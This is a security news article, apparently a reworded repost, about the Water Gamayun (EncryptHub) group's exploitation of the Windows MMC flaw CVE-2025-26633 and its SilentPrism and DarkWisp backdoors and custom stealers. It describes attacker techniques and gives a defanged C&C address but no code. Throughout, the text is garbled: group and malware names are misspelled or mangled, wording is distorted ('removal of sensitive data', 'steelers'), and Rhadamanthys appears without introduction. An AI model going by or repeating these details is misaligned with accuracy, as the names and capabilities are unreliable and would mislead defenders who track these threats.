Threat actors behind the zero-day exploitation of recently patched security vulnerabilities in Microsoft Windows have been found to offer two new backdoors called SilentPrism and DarkWisp.
This activity stems from a suspected group of Russian hacking groups called Water Gamayun, also known as Encrypthub and Larva-208.
“Threat Actor deploys the payload primarily using malicious provisioning packages, signed .MSI files, and Windows MSC files, and command execution techniques such as Intellij runnerw.exe, Trend Micro researchers Aliakbar Zahravi and Ahmed Mohamed Ibrahim said in a follow-up analysis published last week.
Water Gamayun is linked to the aggressive exploitation of CVE-2025-26633 (aka MSC Eviltwin), a vulnerability in the Microsoft Management Console (MMC) framework, to run malware using Rogue Microsoft Console (.MSC) files.
The attack chain includes the use of provisioning packages (.ppkg), signed Microsoft Windows installer files (.msi), and .msc files, delivering information stealers and backdoors that are persistent and data theft.
Ancrypthub attracted attention towards the end of June 2024 after using a Github repository named “Encrypthub” to push different kinds of malware families, including steelers, miners, ransomware and more via fake Winrar websites. Threat actors have since moved to infrastructure for both staging and command and control (C&C).
The .msi installer used in attacks is equipped with legal messaging and conferencing software such as Dingtalk, qqtalk, and Voov Meeting. They are designed to run the PowerShell downloader and are then used to retrieve and run the next stage payload on the compromised host.
One such malware is a PowerShell implant called SilentPrism, which can set up persistence, execute multiple shell commands simultaneously, and maintain remote control. Another Powershell backdoor is DarkWisp, which allows for system reconnaissance, removal of sensitive data, and persistence.
“When malware removes reconnaissance and system information into a C&C server, it enters a continuous loop waiting for commands,” the researchers said. “The malware accepts commands over a TCP connection on port 8080. Here the commands arrive at the format command |.”
“The main communication loop ensures continuous interaction with the server, processing commands, maintaining connections, and secure transmission of results.”
The third payload dropped in the attack is the MSC Eviltwin loader that weaponizes CVE-2025-26633 to run malicious .MSC files. The loader is designed to perform a system cleanup so that it does not leave the forensic trail.
Rhadamanthys is far from the only stolen item in Water Gamayun’s arsenal. It has been observed that they are delivering another commodity steeler called Stealc and three custom PowerShell variants called Encrypthub Stealer variant A, Variant B, and Variant C.
Custom Steelers are fully functional malware that can collect a wide range of system information, including details such as antivirus software, installed software, network adapters, running applications, and more. It also extracts session data from Wi-Fi passwords, Windows product keys, clipboard history, browser credentials, and various apps related to messaging, VPN, FTP, and password management.
Additionally, it focuses on collecting recovery phrases related to cryptocurrency wallets, specifically single-outing files that match specific keywords and extensions.
“These variants exhibit similar functions and capabilities, and only have minor modifications that distinguish them,” the researchers noted. “All enliptob variants covered in this study are modified versions of the open source Kemathia Stealer.”
One iteration of Encrypthub Stealer is worth noting that Intellij Process Launcher “Runnerw.exe” uses the new Living Off Binary (LOLBIN) technology, which is used to proxy the execution of remote PowerShell scripts on infected systems.
Steeler artifacts distributed through malicious MSI packages or binary malware droppers have also been found to propagate other malware families such as Lumma Stealer, Amadey, and Clippers.
Further analysis of the C&C infrastructure of threat actors (“82.115.223[.]182”) revealed the ability to use other PowerShell scripts to download and run AnyDesk software for remote access and send Base64-encoded remote commands to the victim machine.
“Water Gamayun uses a variety of delivery methods and techniques in its campaigns, including provisioning malicious payloads via signed Microsoft installer files and leveraging Lolbins, highlighting adaptability in victims’ system and data breach,” Trend Micro said.
“The intricately designed payload and C&C infrastructure allow threat actors to remain persistent, dynamically control infected systems and obfuscate activity.”
Source link
